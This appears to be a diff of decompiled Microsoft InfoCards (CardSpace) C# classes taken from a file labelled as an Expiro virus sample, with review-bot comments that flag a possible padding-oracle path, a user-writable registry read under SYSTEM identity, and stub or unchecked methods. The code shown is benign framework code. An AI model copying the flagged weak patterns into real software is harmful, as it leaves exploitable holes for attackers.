this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[0].Image), "", fUseElevatedToken1);
}
}
public void Dispose()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
internal struct DownlevelAtData
{
public string RegistryPath;
public string Image;
public string AdditionalImage;
public DownlevelAtData(string path, string image, string additional)
{
this.RegistryPath = path;
this.Image = image;
this.AdditionalImage = additional;
}
}
}
}
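Review bot: In RestartOnInfoCardDesktop, `registryKey.GetValueKind(AccessibilityHelperForXpWin2k3.keyName)` is called whenever the key exists, but GetValueKind throws when the named value is absent instead of returning a sentinel. A Utility Manager key without a "Start on locked desktop" value therefore aborts the whole loop. The key is opened under `Registry.Users` for the caller's SID, so its contents are presumably user-writable while this code runs inside `using (new SystemIdentity(false))`. Reading the value defensively avoids the throw: `object raw = registryKey == null ? null : registryKey.GetValue(AccessibilityHelperForXpWin2k3.keyName); if (raw is int) nullable1 = (int) raw;`. Separately, RestartOnUsersDesktop discards the result of `CreateProcessAsUserHelperWrapper` and always returns false, so a failed relaunch is invisible to the caller.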
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AppliesToBehaviorDecision
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal enum AppliesToBehaviorDecision : byte
{
DoNotSend,
SendRPAppliesTo,
SendCustomAppliesTo,
FailMatch,
}
}
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AppliesToBehaviorDecisionTable
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.ServiceModel;
namespace Microsoft.InfoCards
{
internal static class AppliesToBehaviorDecisionTable
{
private static AppliesToBehaviorDecision[,] appliesToDecisionTable = new AppliesToBehaviorDecision[2, 3];
static AppliesToBehaviorDecisionTable()
{
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 0] = AppliesToBehaviorDecision.DoNotSend;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 0] = AppliesToBehaviorDecision.FailMatch;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 1] = AppliesToBehaviorDecision.DoNotSend;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 1] = AppliesToBehaviorDecision.SendRPAppliesTo;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 2] = AppliesToBehaviorDecision.SendCustomAppliesTo;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 2] = AppliesToBehaviorDecision.SendRPAppliesTo;
}
private static AppliesToBehaviorDecision GetAppliesToBehaviorDecision(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo,
bool considerUnrecognizedElements)
{
int index = (EndpointAddress) null == policy.PolicyAppliesTo ? 0 : 1;
if (considerUnrecognizedElements)
index = policy.NonWhiteListElementsFound ? 1 : index;
return AppliesToBehaviorDecisionTable.appliesToDecisionTable[index, (int) requireAppliesTo];
}
public static AppliesToBehaviorDecision GetAppliesToBehaviorDecisionForRst(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo)
{
return AppliesToBehaviorDecisionTable.GetAppliesToBehaviorDecision(policy, requireAppliesTo, false);
}
public static AppliesToBehaviorDecision GetAppliesToBehaviorDecisionForPolicyMatch(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo)
{
return AppliesToBehaviorDecisionTable.GetAppliesToBehaviorDecision(policy, requireAppliesTo, true);
}
}
}
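Review bot: The 2x3 `appliesToDecisionTable` is filled in the static constructor with no statement of what its axes mean, and the lookup `appliesToDecisionTable[index, (int) requireAppliesTo]` relies on `RequireAppliesToStatus` having exactly three values in 0..2 (the enum is not visible in this hunk). I would add a comment above the field such as `// rows: 0 = policy has no AppliesTo (and, for policy match, no non-whitelisted elements), 1 = otherwise; columns: (int) RequireAppliesToStatus, must stay within 0..2`. The field can also be declared `private static readonly`, since it is never reassigned. This table decides whether a relying party's AppliesTo is sent or the match fails, so the mapping should be readable without decoding the index arithmetic.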
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.Asn1Utilities
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal class Asn1Utilities
{
private Asn1Utilities()
{
}
public static string ToHexDump(byte[] bytes) => "";
}
}
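Review bot: `ToHexDump` ignores its `bytes` argument and always returns an empty string, which is not evident from the name and would leave any trace line that calls it blank. It may have been compiled out of the shipped build, but the listing should say so, for example `// Stub: always returns ""; the input is never formatted`. A private constructor on a class with only static members also suggests `internal static class Asn1Utilities` as the clearer declaration.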
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AsymmetricCryptoSession
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AsymmetricCryptoSession : CryptoSession
{
private RSACryptoServiceProvider m_provider;
public AsymmetricCryptoSession(
Process process,
DateTime expirationTime,
WindowsIdentity identity,
RSACryptoServiceProvider key)
: base(process, expirationTime, identity, (object) key, CryptoSession.SessionType.Asymmetric)
{
this.m_provider = key;
}
protected override void OnWrite(BinaryWriter bwriter)
{
bwriter.Write(this.m_provider.KeySize);
Utility.SerializeString(bwriter, this.m_provider.KeyExchangeAlgorithm);
Utility.SerializeString(bwriter, this.m_provider.SignatureAlgorithm);
}
protected override void OnDispose()
{
this.m_provider.Clear();
this.m_provider.Dispose();
this.m_provider = (RSACryptoServiceProvider) null;
}
public byte[] Encrypt(bool fOAEP, byte[] inData)
{
this.ThrowIfDisposed();
return this.m_provider.Encrypt(inData, fOAEP);
}
public byte[] Decrypt(bool fOAEP, byte[] inData)
{
this.ThrowIfDisposed();
return this.m_provider.Decrypt(inData, fOAEP);
}
public byte[] SignHash(byte[] hash, string hashAlgOid)
{
this.ThrowIfDisposed();
return this.m_provider.SignHash(hash, hashAlgOid);
}
public bool VerifyHash(byte[] hash, string hashAlgOid, byte[] sig)
{
this.ThrowIfDisposed();
return this.m_provider.VerifyHash(hash, hashAlgOid, sig);
}
}
}
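Review bot: `Decrypt(bool fOAEP, byte[] inData)` passes the caller's padding choice straight to `m_provider.Decrypt`, so `fOAEP == false` selects PKCS#1 v1.5 decryption. If the requesting process can distinguish padding failures from other errors, that is the classic padding-oracle shape. Whether a layer above restricts the flag is not visible in this hunk, so at minimum the method should carry a comment like `// fOAEP == false selects PKCS#1 v1.5; callers must not expose padding failures to the requester`. `SignHash` and `VerifyHash` likewise accept any `hashAlgOid` without an allow-list. `OnDispose` calls `Clear()` and then `Dispose()` on `m_provider` without a null guard, so a second call would throw unless the base class prevents re-entry.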
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AsyncParams
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.Win32.SafeHandles;
namespace Microsoft.InfoCards
{
internal abstract class AsyncParams
{
private RpcAsyncResult m_asyncResult;
protected AsyncParams(ClientRequest request, string opType, SafeWaitHandle externEvent) => this.m_asyncResult = new RpcAsyncResult(request, opType, externEvent);
public RpcAsyncResult AsyncResult => this.m_asyncResult;
}
}
